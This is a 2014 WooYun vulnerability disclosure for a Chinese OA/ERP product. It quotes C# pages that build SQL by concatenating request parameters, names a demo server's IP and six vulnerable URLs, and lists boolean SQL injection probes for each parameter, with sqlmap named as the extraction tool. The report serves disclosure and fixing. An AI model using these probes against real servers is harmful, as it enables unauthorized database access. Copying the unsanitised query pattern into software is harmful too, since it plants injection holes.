当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061648

漏洞标题:某OA系统越权导致多处SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-05-20 23:06

修复时间:2014-08-18 23:08

公开时间:2014-08-18 23:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-20: 细节已通知厂商并且等待厂商处理中
2014-05-25: 厂商已经确认,细节仅向厂商公开
2014-05-28: 细节向第三方安全合作伙伴开放
2014-07-19: 细节向核心白帽子及相关领域专家公开
2014-07-29: 细节向普通白帽子公开
2014-08-08: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

对于oa的 我只找了demo站进行测试

详细说明:

科瑞OA
公司主页

http://www.shkrsoft.com/


测试站连接

http://www.shkrsoft.com/yanshi/onlinetest.asp


这就是测试站了

http://113.128.254.170:8088/OA/login.aspx


第一处

http://113.128.254.170:8088/oa/erp/SelectObject/SelctProviderName.aspx


protected void Page_Load(object sender, EventArgs e)
{
    DataTable table = new DataTable();
    string str = base.Request["goodsName"];
    if (string.IsNullOrEmpty(str))
    {
        if (str != "")
        {
            table = DbTool.ExecuteDataTable("SELECT P.PROVIDERID,P.PROVIDERNAME FROM JXNF_PROVIDER P  WHERE P.ISDEL=0 AND ISSAVE!='未保存' AND PROVIDERSTATE='关闭' AND P.PROVIDERNAME LIKE '%" + str + "%'"); //没对参数进行处理
        }
    }
    else
    {
        table = DbTool.ExecuteDataTable("SELECT P.PROVIDERID,P.PROVIDERNAME FROM JXNF_PROVIDER P  WHERE P.ISDEL=0 AND ISSAVE!='未保存' AND PROVIDERSTATE='关闭' AND P.PROVIDERNAME LIKE '%" + str + "%'");
    }
    base.Response.Write(JsonConvert.SerializeObject(table));
}


证明如下
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelctProviderName.aspx


提交

goodsName=%


正常显示

5205.png


提交

goodsName=%' and 1=1--


5206.png


提交

goodsName=%' and 1=2 --


5207.png


可判断存在注入
用sqlmap 可获得数据

52011.png


第二处

http://113.128.254.170:8088/oa/erp/SelectObject/SelctYingShouXSCK.aspx


protected void Page_Load(object sender, EventArgs e)
{
    if (!base.IsPostBack)
    {
        this.Bind(false);
    }
}
public void Bind(bool check)
{
    StringBuilder builder = new StringBuilder();
    builder.Append("SELECT TI.ITEMID,TH.TIHUOCODE,C.CUSTOMER,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,TI.REALITY,TI.PRICE,'0' SHUILV\r\n        FROM JXNF_TIHUOITEM TI\r\n        LEFT JOIN JXNF_TIHUO TH ON TI.WARRANTID=TH.TIHUOID\r\n        LEFT JOIN JXNF_CUSTOMER C ON TH.CUSTOMERID=C.CUSTOMERID\r\n        LEFT JOIN JXNF_PRODUCT P ON P.PRODUCTID=TI.PRODUCTID\r\n        WHERE TH.STATE IN ('全部出库','部分出库') AND ISYINGSHOU='0' AND TH.CUSTOMERID='" + base.Request["customerid"] + "' ");//customerid参数没处理存在注入
    builder.Append(" and ti.itemid not in (select billid from jxnf_yingshoubody)");
    if (check)
    {
        builder.Append(this.tbOutInCode.Text.Trim().Equals("") ? "" : (" AND TH.TIHUOCODE LIKE '%" + this.tbOutInCode.Text.Trim() + "%'"));
        builder.Append(this.tbZdMan.Text.Trim().Equals("") ? "" : (" AND TH.ZDMAN IN (SELECT EMP_ID FROM JXNF_EMPLOYEES E ON E.EMP_NAME LIKE '%" + this.tbZdMan.Text.Trim() + "%')"));
        builder.Append(this.tbZdDate.Text.Trim().Equals("") ? "" : (" AND ZDDATE='" + this.tbZdMan.Text.Trim() + "'"));
        builder.Append(this.tbProductCode.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTCODE LIKE '%" + this.tbProductCode.Text.Trim() + "%'"));
        builder.Append(this.tbProductName.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTNAME LIKE '%" + this.tbProductName.Text + "%'"));
        builder.Append(this.tbModel.Text.Trim().Equals("") ? "" : (" AND MODEL LIKE '" + this.tbModel.Text.Trim() + "'"));
    }
    pg.Sql = builder.ToString();
    pg.SqlKey = "TI.ITEMID";
    this.AspNetPager1.RecordCount = pg.GetRecordCount();
    pg.PageSize = this.AspNetPager1.PageSize;
    pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
    this.GridViewMain.DataSource = pg.GetPageData();
    this.GridViewMain.DataBind();
}


证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelctYingShouXSCK.aspx


提交

customerid=1000

正常显示

5208.png


提交

customerid=1000' and 1=1--

正常显示

5209.png


提交

customerid=1000' and 1=2 --


52010.png


可得知存在注入 mssql是可以爆出东西 就不再用sqlmap扫一遍了
第三处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCGYFCheck.aspx


protected void Page_Load(object sender, EventArgs e)
{
    if (!base.IsPostBack)
    {
        this.Bind(false);
    }
}
protected void Bind(bool bol)
{
    try
    {
        pg.PageType = PaginationType.TopNotIn;
        StringBuilder builder = new StringBuilder();
        builder.Append("SELECT TYPE+'_'+CONVERT(VARCHAR(10),ITEMID) TYPEITEMID,ITEMID,TYPE,CODE,PROVIDERID,PROVIDERNAME,PRODUCTID,PRODUCTCODE,PRODUCTNAME,MODEL,UNIT,NUM,YFNUM,WYFNUM FROM (SELECT C.ITEMID ITEMID,'采购入库' TYPE,G.RKCODE CODE,G.PROVIDERID,V.PROVIDERNAME,C.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(C.RKNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(C.RKNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_PARIVER C \r\n                        LEFT JOIN JXNF_CGENTER G ON G.ENTERID=C.CGRKID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=G.PROVIDERID LEFT JOIN JXNF_PRODUCT P ON C.PRODUCTID=P.PRODUCTID LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n                        WHERE F.STATE='已审核' AND Y.CODETYPE='采购入库' GROUP BY Y.BILLID) A ON A.BILLID=C.ITEMID WHERE G.STATE='已审核' AND ISNULL(A.NUM,0)<ISNULL(C.RKNUM,0)");
        builder.Append(" UNION ALL ");
        builder.Append("SELECT T.ID ITMEID,'采购退货' TYPE,H.THCODE CODE,H.PROVIDERID,V.PROVIDERNAME,T.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(T.THNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(T.THNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_CGTHBODY T \r\n                        LEFT JOIN JXNF_CGTHHEAD H ON H.ID=T.THID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=H.PROVIDERID LEFT JOIN JXNF_PRODUCT P ON P.PRODUCTID=T.PRODUCTID\r\n                        LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n                        WHERE F.STATE='已审核' AND Y.CODETYPE='采购退货' GROUP BY Y.BILLID) A ON A.BILLID=T.ID WHERE H.STATE='已审核' AND ISNULL(A.NUM,0)<ISNULL(T.THNUM,0)");
        builder.Append(" UNION ALL ");
        builder.Append("SELECT Q.OTHERBODYID ITEMID,'其他入库' TYPE,T.OTHERCODE CODE,T.CHANGEPLACE PROVIDERID,V.PROVIDERNAME,Q.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(Q.GOODNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(Q.GOODNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_QTCRKBODY Q \r\n                        LEFT JOIN JXNF_QTCRKHEAD T ON T.OTHERHEADID=Q.OTHERHID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=T.CHANGEPLACE LEFT JOIN JXNF_PRODUCT  P ON P.PRODUCTID=Q.PRODUCTID\r\n                        LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n                        WHERE F.STATE='已审核' AND Y.CODETYPE='其他入库' GROUP BY Y.BILLID) A ON A.BILLID=Q.OTHERBODYID WHERE T.STATE='完结' AND T.OTHER='其他入库' \r\n                        AND T.BUSINESSTYPE IN (SELECT B_Typeid FROM JXNF_BusinessType WHERE B_TypeClass='采购相关' and B_IsGenerateBill=2) AND ISNULL(A.NUM,0)<ISNULL(Q.GOODNUM,0)");
        builder.Append(" UNION ALL ");
        builder.Append("SELECT Q.OTHERBODYID ITEMID,'其他出库' TYPE,T.OTHERCODE CODE,T.CHANGEPLACE PROVIDERID,V.PROVIDERNAME,Q.PRODUCTID,P.PRODUCTCODE,P.PRODUCTNAME,P.MODEL,P.UNIT,ISNULL(Q.GOODNUM,0) NUM,ISNULL(A.NUM,0) YFNUM,ISNULL(Q.GOODNUM,0)-ISNULL(A.NUM,0) WYFNUM FROM JXNF_QTCRKBODY Q \r\n                        LEFT JOIN JXNF_QTCRKHEAD T ON T.OTHERHEADID=Q.OTHERHID LEFT JOIN JXNF_PROVIDER V ON V.PROVIDERID=T.CHANGEPLACE LEFT JOIN JXNF_PRODUCT  P ON P.PRODUCTID=Q.PRODUCTID\r\n                        LEFT JOIN (SELECT Y.BILLID,SUM(ISNULL(Y.YFNUM,0)) NUM FROM JXNF_YINGfuBODY Y LEFT JOIN JXNF_YINGfuHEAD F ON Y.YINGfuHID=F.YINGfuHID\r\n                        WHERE F.STATE='已审核' AND Y.CODETYPE='其他出库' GROUP BY Y.BILLID) A ON A.BILLID=Q.OTHERBODYID WHERE T.STATE='完结' AND T.OTHER='其他出库' \r\n                        AND T.BUSINESSTYPE IN (SELECT B_Typeid FROM JXNF_BusinessType WHERE B_TypeClass='采购相关' and B_IsGenerateBill=2) AND ISNULL(A.NUM,0)<ISNULL(Q.GOODNUM,0)) A WHERE 1=1");
        if (base.Request["provid"].ToString() != "")
        {
            builder.Append(" AND PROVIDERID='" + base.Request["provid"].ToString() + "'"); //存在注入
        }
        builder.Append(" ORDER BY CODE DESC");
        pg.Sql = builder.ToString();
        pg.SqlKey = "CODE+CAST(PRODUCTID as NVARCHAR(10))+CAST(ITEMID as NVARCHAR(10))";
        this.AspNetPager1.RecordCount = pg.GetRecordCount();
        pg.PageSize = this.AspNetPager1.PageSize;
        pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
        this.GridViewMain.DataSource = pg.GetPageData();
        this.GridViewMain.DataBind();
    }
    catch
    {
        ScriptManager.RegisterClientScriptBlock(this.UpdatePanel1, base.GetType(), "123", "alert('页面数据加载失败,请重新加载页面!');", true);
    }
}


证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCGYFCheck.aspx


提交

provid=1000


正常显示

52012.png


提交

provid=1000' and 1=1 --


52013.png


提交

provid=1000' and 1=2 --


52014.png


可判断存在注入
第四处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCaiGouTuiHuoDetails.aspx


protected void Page_Load(object sender, EventArgs e)
{
    base.Response.Buffer = true;
    base.Response.Expires = 0;
    base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
    base.Response.CacheControl = "no-cache";
    if (!base.IsPostBack)
    {
        this.Bind(false, base.Request["providerid"].ToString()); //没处理
    }
}
protected void Bind(bool bo, string cusid)
{
    try
    {
        pg.PageType = PaginationType.TopNotIn;
        StringBuilder builder = new StringBuilder();
        builder.Append("select p.ID itemid,g.thCODE,r.providerid,r.providername,\r\n                        d.productid,d.productname,d.model,p.thnum\r\n                        from JXNF_CGTHBODY p\r\n                        left join JXNF_CGTHhead g on g.ID=p.thID\r\n                        left join jxnf_provider r on r.providerid=g.providerid\r\n                        left join jxnf_product d on d.productid=p.productid\r\n                        where 1=1 and r.providerid='" + base.Request["providerid"].ToString() + "'");//没处理
        builder.Append(" and p.ID not in (select billid from jxnf_yingfubody)");
        if (bo)
        {
            builder.Append(this.tbOrderCode.Text.Trim().Equals("") ? "" : (" and g.thCODE LIKE '%" + this.tbOrderCode.Text.Trim() + "%'"));
            builder.Append(this.tbCustomerName.Text.Trim().Equals("") ? "" : (" and r.providerid LIKE '%" + this.tbCustomerName.Text.Trim() + "%'"));
            builder.Append(this.tbProductID.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTID LIKE '%" + this.tbProductID.Text.Trim() + "%'"));
            builder.Append(this.tbProductName.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTNAME LIKE '%" + this.tbProductName.Text.Trim() + "%'"));
        }
        pg.Sql = builder.ToString();
        pg.SqlKey = "p.ITEMID";
        this.AspNetPager1.RecordCount = pg.GetRecordCount();
        pg.PageSize = this.AspNetPager1.PageSize;
        pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
        this.GridViewMain.DataSource = pg.GetPageData();
        this.GridViewMain.DataBind();
    }
    catch
    {
        ScriptManager.RegisterClientScriptBlock(this.UpdatPanel1, base.GetType(), "123", "alert('数据加载失败,请重新加载页面!');", true);
    }
}


漏洞证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectCaiGouTuiHuoDetails.aspx


提交

providerid=1000

正常显示

52015.png


提交

providerid=1000' and 1=1 --


52016.png


提交

providerid=1000' and 1=2 --


52017.png


可判断存在注入
第五处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectTuiHouDetails.aspx


protected void Page_Load(object sender, EventArgs e)
{
    base.Response.Buffer = true;
    base.Response.Expires = 0;
    base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
    base.Response.CacheControl = "no-cache";
    if (!base.IsPostBack)
    {
        if (base.Request["customerid"].ToString() != "no")
        {
            this.Bind(false, base.Request["customerid"].ToString());
        }
        else
        {
            this.Bind(false);
        }
    }
protected void Bind(bool bo, string cusid)
{
    try
    {
        pg.PageType = PaginationType.TopNotIn;
        StringBuilder builder = new StringBuilder();
        builder.Append("select i.F_QICODE QUITITEMID,q.F_CODE thcode,c.customer,c.customerid,\r\n                        q.F_QUITTIME thDate,p.productid,p.productcode,p.productname,p.model,convert(decimal(10,2),i.F_NUM) thNum,isnull(convert(decimal(10,2),b.zjnum),0) zjnum\r\n                        from JXNF_QUITITEM i\r\n                        left join jxnf_quit q on i.F_QUITID=q.F_ID\r\n                        left join jxnf_customer c on c.customerid=q.F_CURSORMENT\r\n                        left join jxnf_product p on p.productid=i.F_PRODUCTID\r\n                        left join (select relateid,sum(isnull(AMOUNT,0)) zjNum from JXNF_BULLETIN where zhuangtai='已审核' group by relateid) b on b.RELATEID=i.f_qicode\r\n                        where 1=1");
        builder.Append(" and i.F_QICODE not in (select billid from jxnf_yingshoubody)");
        if (base.Request["type"].ToString().Equals("1"))
        {
            builder.Append(" and p.ISZHIJIAN='1' and i.f_state='未质检'\r\n                        and i.f_qicode not in (select RELATEID from jxnf_bulletin where zhuangtai='未审核')");
        }
        else if (base.Request["type"].ToString().Equals("3"))
        {
            builder.Append(" and p.ISZHIJIAN='0' and i.f_state='未质检'");
        }
        else
        {
            builder.Append(" and p.ISZHIJIAN='0'");
        }
        if (bo) //这下面的参数都没进行处理
        {
            builder.Append(this.tbOrderCode.Text.Trim().Equals("") ? "" : (" q.F_CODE LIKE '%" + this.tbOrderCode.Text.Trim() + "%'"));
            builder.Append(this.tbCustomerName.Text.Trim().Equals("") ? "" : (" C.CUSTOMER LIKE '%" + this.tbCustomerName.Text.Trim() + "%'"));
            builder.Append(this.tbProductID.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTID LIKE '%" + this.tbProductID.Text.Trim() + "%'"));
            builder.Append(this.tbProductName.Text.Trim().Equals("") ? "" : (" AND P.PRODUCTNAME LIKE '%" + this.tbProductName.Text.Trim() + "%'"));
        }
        pg.Sql = builder.ToString();
        pg.SqlKey = "i.F_QICODE";
        this.AspNetPager1.RecordCount = pg.GetRecordCount();
        pg.PageSize = this.AspNetPager1.PageSize;
        pg.CurrentPage = this.AspNetPager1.CurrentPageIndex;
        this.GridViewMain.DataSource = pg.GetPageData();
        this.GridViewMain.DataBind();
    }
    catch
    {
        ScriptManager.RegisterClientScriptBlock(this.UpdatPanel1, base.GetType(), "123", "alert('数据加载失败,请重新加载页面!');", true);
    }
}


漏洞证明
访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectTuiHouDetails.aspx?type=0&customerid=1000


在客户名称处输入 

%

然后点击查询

52018.png


在客户名称处输入 

%' and 1=1 --

然后点击查询

52019.png


在客户名称处输入 

%' and 1=2 --

然后点击查询

52020.png


可得知存在注入
第六处

http://113.128.254.170:8088/oa/erp/SelectObject/SelectZhiJian.aspx


访问

http://113.128.254.170:8088/oa/erp/SelectObject/SelectZhiJian.aspx


点击任务单
在任务单号里输入

%

点击查询

52021.png


在任务单号里输入

%' and 1=1 --

点击查询

52022.png


在任务单号里输入

%' and 1=2 --

点击查询

52023.png


可判断存在注入

漏洞证明:

漏洞证明如上

修复方案:

对权限进行限制然后对参数进行处理

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-25 14:32

厂商回复:

最新状态:

暂无